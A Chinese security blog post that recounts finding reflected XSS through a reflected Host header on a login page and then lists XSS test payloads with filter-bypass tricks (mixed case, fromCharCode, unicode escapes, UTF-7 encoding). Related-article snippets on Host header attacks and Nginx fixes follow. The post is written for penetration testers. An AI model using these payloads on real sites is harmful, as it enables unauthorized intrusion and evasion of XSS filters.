第一次在Host头处发现了XSS

最新推荐文章于 2024-05-22 12:22:56 发布
原创 最新推荐文章于 2024-05-22 12:22:56 发布 · 1.8k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #host头处xss

本文详细记录了一次XSS攻击的实际操作过程,包括利用主机头注入漏洞,与XSS过滤器的对抗策略,以及多种payload的构造与执行方法。文中还分享了常用的XSS验证payload,涵盖按键触发、SVG标签利用等场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某天在挖洞时,噼里啪啦一顿信息收集之后发现了个登陆界面如下:

抓请求包

试着把整个host头的值替换成www.baidu.com

host头的值确实会完全展示在页面中,接下来就是与XSS过滤器的一番殊死搏斗了,payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程),重放数据包:

刷新前台页面

最后附上常用的验证xss的payload

accesskey="X" onclick=location="aler"+"t`1`"(按键触发,针对于input标签的hidden属性)<svg/onload=confirm(doucument.domain)>(很多情况,都会忽略svg表签)"><sCrI%20pT%20>PrOmPt('1')</ScrI%20pt>"><sCrI%20pT%20>PrOmPt`1`</ScrI%20pt><script>alert(String.fromCharCode(88,83,83))</script>绕过<>:u003cimg src=1 onerror=alert(/xss/)u003e使用 utf-7 编码可以绕过,比如<script>alert("XSS")</script>使用  UTF-7编码:+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-然后所有的加号需要被改成%2b,否则会被浏览器识别为连接符%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-最后可以将XSS PAYLOAD进行html编码后再进行URL编码,有时候也会有不错的收获。

HTTP请求Host注入
墨痕诉清风的博客
02-14 595
通过正向代理,大大提高了后续用户的访问速度,使他们无需再穿越Internet,只要从本地Web缓存就可以获取所需要的信息,避免了带宽问题,同时可以大量减少重复请求在网络上的传输,从而降低网络流量,节省资费。当用户收到密码重置邮件后,发现是钓鱼者的网址,且秘钥令牌也已参数id的形式传给给攻击者,此时攻击者可以直接使用受害者的令牌进行密码重置。上述代码的意思是,如果请求的host不是这两个地址发来的,最终会返回403错误信息,而不会请求到更改后的服务器IP。上述代码加入的位置:如下图中的server中。
15、如何在 Electron JavaScript 应用程序中查找并利用 XSS 以实现 RCE
silver的专栏
08-01 16
本文详细介绍了如何在 Electron JavaScript 应用程序中查找并利用 XSS 漏洞以实现远程代码执行(RCE)。内容涵盖动态分析与调试、存储型 XSS 的识别与触发、代码分析、漏洞动态确认、XSS 武器化实现 RCE 以及发现的其他 XSS 漏洞点和相关安全漏洞。通过实际案例和操作步骤,帮助安全研究人员理解 Electron 应用程序中潜在的安全风险及应对方法。
使用java代码方式解决XSSHost Head漏洞问题
gmj53的专栏
08-04 1560
一、使用java代码方式解决XSS漏洞问题 1 ESAPI方式 1.1 引入jar包 compile('org.owasp.esapi:esapi:2.2.3.1') { exclude group: 'log4j', module: 'log4j' exclude group: 'org.slf4j', module: 'slf4j-simple' } 1.2 增加配置文件 1.2.1 ESAPI.properties配置文件内容 # 是否要打印配置属性,默认为true ESAPI.p
XSS利用之一看就懂
qq_42743187的博客
01-31 517
xss利用方法之前,先分享一个前几天友情测试的案例吧 一、XSS案例 站点就不说了,图片打码,主要看效果就可以了???? 页面上有个搜索框,输入随机值在标签中输出,不允许输入尖括号,页面会直接显示错误,但双引号可以使用 " οnclick="alert(1),直接测试,查看页面源代码发现一个问题: 就是我输入的英文小括号,输出时变成了中文括号,这样alert()函数就执行不了了。。。 于是想到,用反引号来代替小括号试试,成功弹窗,源代码显示如下: 但是这里又存在一个问题,反引号里的内容会被当成字符串
一个简单的XSS检测工具
weixin_44611282的博客
06-10 1273
检测的主要流程: 发送随机flag -> 确定参数回显 -> 确定回显位置以及情况(html,js语法解析) -> 根据情况根据不同payload探测 -> 使用html,js语法解析确定是否多出来了标签,属性,js语句等等。 在拿到一个域名后开始深度检索存在的所有链接(href,src),在经过数据清洗后得到有用的页面(去除js等其他目录) def SearchDir(TestUrl): header = { 'User-Agent':
网站安全个人总结
weixin_33756418的博客
05-12 234
常见攻击方式:XSS、SQL注入、木马、零日攻击、僵尸网络、资源枚举、参数操作、跨站请求伪造、钓鱼欺骗、Dos攻击拒绝服务等。 常用防止方式:黑名单过滤(有时候我们在对网站过来的请求进行黑名单理 把那些暴漏出来的攻击方法写在黑名单中 当请求过来的时候第一时间去 用黑名单进行过虑 但是 这样的话就要时刻关注有那些漏洞 要及时的去添加到黑名单中 更新 这样就出现了一种被动的防御体系 要我们时时去关...
xss and ssrf bypass 小tips
yggcwhat
04-26 2467
xss and ssrf bypass 小tips
BurpSuite手册-004-运行你的第一次扫描
06-24
在进行第一次扫描时,Burp Suite用户手册建议用户逐步执行以下步骤: 1. 打开扫描器:在Dashboard选项卡中选择New scan,打开扫描器对话框,这里可以调整扫描的各种设置。 2. 输入目标站点的URL:在相应的字段中输入...
个人笔记-渗透测试-XSS漏洞
weixin_48162696的博客
05-22 713
XSS,反射型,存储型,XSS的检测和利用,XSS的防御方法
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4953
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
web漏洞理之host攻击
zjw00000的博客
10-14 3533
一、host攻击介绍 1、介绍(这段介绍是从网上copy的,关于它的理是我自己总结,整理的) 这个Host是在客户端的请求中的,是由客户端提供的,也就是说客户端可以修改这个值。那么,只要是能被客户端修改的值,都是不可信任的。 当Host部被修改为无效Host会发生什么情况?大多数web服务器配置为将无法识别的Host传送给列表中的第一台虚拟主机或者返回错误信息。因此,这使得把携带有任...
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 6万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
让你成为网络世界中有破坏力的人-HTTP报文HOST攻击
Eason_LYC安全白帽子的成长博客
05-19 2892
文中有彩蛋哦。随我的文章细细读来,让你成为一个在网络世界中有破坏力的人! tips:请遵守国家相关法律法规。在专用靶场或取得合法授权情况下进行安全渗透测试
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部)
zJay-L's Blog
03-01 7089
Nginx: 常见漏洞修复(Host攻击|不安全的Http方法|缺少X-XSS-Protection部) Host攻击 在server模块配置: if ($host !~* xxx.xxx.xxx|xxx.ddd.ddd.ddd) { return 403; } 或者 if ($http_Host !~* xxx.xxx.xxx:port|xxx.ddd.ddd.ddd:port) { return 403; } xxx.xxx.xxx:代表域名
URL存在http host攻击漏洞-修复方案
爱旅行的攻城狮
02-01 4万+
【使用Nginx的修复方案】 if ( $host !~* " 10.4.15.1| 10.9.4.9 " ) { return 403; } 【基于tocmat的修复方案】 经测试,最低支持Tomcat6.0.x以上版本的修复。 修复方式 打开tomcat的conf目录中的server.xml文件,将Host节点做如下配置: <Host name="www....
tomcat启动报错too low setting for -Xss
lb89012784的专栏
03-07 2万+
tomcat启动报错too low setting for -Xss 网上给的答案都是调整Xss参数,其实不是正确的做法, -Xss:每个线程的Stack大小,“-Xss 15120” 这使得tomcat每增加一个线程(thread)就会立即消耗15M内存,而最佳值应该是128K,默认值好像是512k. 具体报错如下 Caused by: java.lang.IllegalStateEx
常见的Web漏洞——XSS
江左盟的博客
07-08 2万+
目录 XSS简介 XSS原理及分类 反射型XSS 存储型XSS 基于DOM的XSS XSSer的使用 至少有一个的参数: 可选的参数: 检查选项 选择攻击向量 绕过防火墙选项 绕过器选项 特殊技术 最后注入选项 特殊最后注入选项 报告导出 XSSer演示 BeEF-XSS 漏洞的防范 总结 XSS简介 XSS是跨站脚本攻击(Cross Site Scri...
帮写一个微信表白代码
最新发布
08-02
我们正在理一个关于微信表白功能实现的问题。用户要求提供代码示例,而我们的引用[1]和引用[2]提供了一些背景信息。但是,请注意,引用内容是关于微信小程序表白功能的,而用户的问题也是关于微信表白功能实现的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值